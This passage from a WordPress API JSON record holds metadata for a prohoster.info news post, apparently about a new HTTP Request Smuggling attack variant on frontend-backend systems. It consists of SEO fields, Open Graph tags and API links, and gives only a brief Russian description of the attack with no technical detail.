\u043e\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u043e\u0434\u0432\u0435\u0440\u0436\u0435\u043d\u044b \u043d\u043e\u0432\u043e\u043c\u0443 \u0432\u0430\u0440\u0438\u0430\u043d\u0442\u0443 \u0430\u0442\u0430\u043a\u0438 &quot;HTTP Request Smuggling&quot;, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0447\u0435\u0440\u0435\u0437 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0443 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u043e\u0444\u043e\u0440\u043c\u043b\u0435\u043d\u043d\u044b\u0445.","og:url":"https:\/\/prohoster.info\/sq\/blog\/news\/novaya-ataka-na-sistemy-frontend-bekend-pozvolyayushhaya-vklinitsya-v-zaprosy","og:image":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:secure_url":"https:\/\/prohoster.info\/wp-content\/uploads\/2021\/11\/logo-350.jpg","og:image:width":350,"og:image:height":350,"article:published_time":"2021-08-07T14:22:35+00:00","article:modified_time":"2026-02-09T15:18:09+00:00","article:publisher":"https:\/\/www.facebook.com\/prohoster","article:author":"https:\/\/www.facebook.com\/prohoster"},"aioseo_meta_data":{"post_id":"100934","title":null,"description":null,"keywords":null,"keyphrases":null,"primary_term":null,"canonical_url":null,"og_title":null,"og_description":null,"og_object_type":"default","og_image_type":"default","og_image_url":null,"og_image_width":null,"og_image_height":null,"og_image_custom_url":null,"og_image_custom_fields":null,"og_video":null,"og_custom_url":null,"og_article_section":null,"og_article_tags":null,"twitter_use_og":false,"twitter_card":"default","twitter_image_type":"default","twitter_image_url":null,"twitter_image_custom_url":null,"twitter_image_custom_fields":null,"twitter_title":null,"twitter_description":null,"schema":{"blockGraphs":[],"customGraphs":[],"default":{"data":{"Article":[],"Course":[],"Dataset":[],"FAQPage":[],"Movie":[],"Person":[],"Product":[],"ProductReview":[],"Car":[],"Recipe":[],"Service":[],"SoftwareApplication":[],"WebPage":[]},"graphName":"","isEnabled":true},"graphs":[]},"schema_type":null,"schema_type_options":null,"pillar_content":false,"robots_default":true,"robots_noindex":false,"robots_noarchive":false,"robots_nosnippet":false,"robots_nofollow":false,"robots_noimageindex":false,"robots_noodp":false,"robots_notranslate":false,"robots_max_snippet":null,"robots_max_videopreview":null,"robots_max_imagepreview":"large","priority":null,"frequency":null,"local_seo":null,"seo_analyzer_scan_date":null,"breadcrumb_settings":null,"limit_modified_date":false,"reviewed_by":null,"ai":null,"created":"2021-08-07 15:27:20","updated":"2026-02-09 15:18:09","focus_keyword":null,"additional_keywords":null,"truseo_locale":null},"gt_translate_keys":[{"key":"link","format":"url"}],"_links":{"self":[{"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/posts\/100934","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/comments?post=100934"}],"version-history":[{"count":2,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/posts\/100934\/revisions"}],"predecessor-version":[{"id":158412,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/posts\/100934\/revisions\/158412"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/media\/100935"}],"wp:attachment":[{"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/media?parent=100934"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/categories?post=100934"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/prohoster.info\/sq\/wp-json\/wp\/v2\/tags?post=100934"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}